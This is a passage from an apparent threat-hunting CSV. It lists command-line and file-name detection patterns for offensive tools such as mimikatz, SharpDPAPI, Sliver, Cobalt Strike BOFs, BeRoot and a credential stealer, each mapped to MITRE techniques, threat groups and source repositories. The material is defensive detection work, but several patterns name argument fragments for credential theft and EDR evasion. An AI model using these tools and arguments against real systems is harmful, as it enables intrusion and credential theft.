- LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","378" "* beacon_win_default*",".{0,1000}\sbeacon_win_default.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","379" "* --beacon=*",".{0,1000}\s\-\-beacon\=.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","380" "* beacon64.bin *",".{0,1000}\sbeacon64\.bin\s.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 
- T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","0","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","381" "* Benjamin DELPY *",".{0,1000}\sBenjamin\sDELPY\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#content","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","382" "* 
beRoot.exe*",".{0,1000}\sbeRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","383" "* beRoot.py*",".{0,1000}\sbeRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","384" "* bettercap*",".{0,1000}\sbettercap.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","385" "* --bf-hashes-file *",".{0,1000}\s\-\-bf\-hashes\-file\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","386" "* --bf-passwords-file *",".{0,1000}\s\-\-bf\-passwords\-file\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","387" "* --bhdump *",".{0,1000}\s\-\-bhdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","388" "* bhqc.py -*",".{0,1000}\sbhqc\.py\s\-.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","389" "* bin2mac.py*",".{0,1000}\sbin2mac\.py.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","391" "* -bindPipe * -destHost * -destPort *",".{0,1000}\s\-bindPipe\s.{0,1000}\s\-destHost\s.{0,1000}\s\-destPort\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 - TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","392" "* 
bitcoin-getaddr.nse*",".{0,1000}\sbitcoin\-getaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","393" "* bitcoin-info.nse*",".{0,1000}\sbitcoin\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","394" "* bitcoinrpc-info.nse*",".{0,1000}\sbitcoinrpc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","395" "* BITSInject.py*",".{0,1000}\sBITSInject\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","396" "* BITSJobPayloads.py*",".{0,1000}\sBITSJobPayloads\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","397" "* bittorrent-discovery.nse*",".{0,1000}\sbittorrent\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","398" "* bjnp-discover.nse*",".{0,1000}\sbjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","399" "* Blackout.cpp*",".{0,1000}\sBlackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","400" "* Blackout.sln*",".{0,1000}\sBlackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","401" "* Blackout.sys*",".{0,1000}\sBlackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","402" "* BlankOBF.py*",".{0,1000}\sBlankOBF\.py.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","403" "* BlankOBFv2.py*",".{0,1000}\sBlankOBFv2\.py.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","404" "* bleeding-jumbo john*",".{0,1000}\sbleeding\-jumbo\sjohn.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","405" "* blindeventlog.exe*",".{0,1000}\sblindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","406" "* blob /target:*.bin* 
/pvk:*",".{0,1000}\sblob\s\/target\:.{0,1000}\.bin.{0,1000}\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","407" "* blob /target:*.bin* /unprotect*",".{0,1000}\sblob\s\/target\:.{0,1000}\.bin.{0,1000}\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","408" "* block_dll_policy.exe*",".{0,1000}\sblock_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","409" "* --blockDLLs --ruy-lopez*",".{0,1000}\s\-\-blockDLLs\s\-\-ruy\-lopez.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","1","N/A","N/A","N/A","N/A","410" "* --bloodhound --import-data *",".{0,1000}\s\-\-bloodhound\s\-\-import\-data\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - 
T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","411" "* --bloodhound --mark-owned *",".{0,1000}\s\-\-bloodhound\s\-\-mark\-owned\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","412" "* --bloodhound --ns ip --collection All*",".{0,1000}\s\-\-bloodhound\s\-\-ns\sip\s\-\-collection\sAll.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","413" "* --bloodhound --sync *",".{0,1000}\s\-\-bloodhound\s\-\-sync\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","414" "* --bloodhound-file *",".{0,1000}\s\-\-bloodhound\-file\s.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","415" "* bloodhoundsync.py*",".{0,1000}\sbloodhoundsync\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","416" "* bof_allocator *",".{0,1000}\sbof_allocator\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group 
- Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","417" "* bof_reg_collect_parser.py*",".{0,1000}\sbof_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","418" "* bof_reuse_memory *",".{0,1000}\sbof_reuse_memory\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - 
Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","419" "* -BOFBytes *",".{0,1000}\s\-BOFBytes\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - 
Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","420" "* bofhound.py*",".{0,1000}\sbofhound\.py.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","421" "* BOFNET *",".{0,1000}\sBOFNET\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - 
LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","422" "* BofRunner(*",".{0,1000}\sBofRunner\(.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 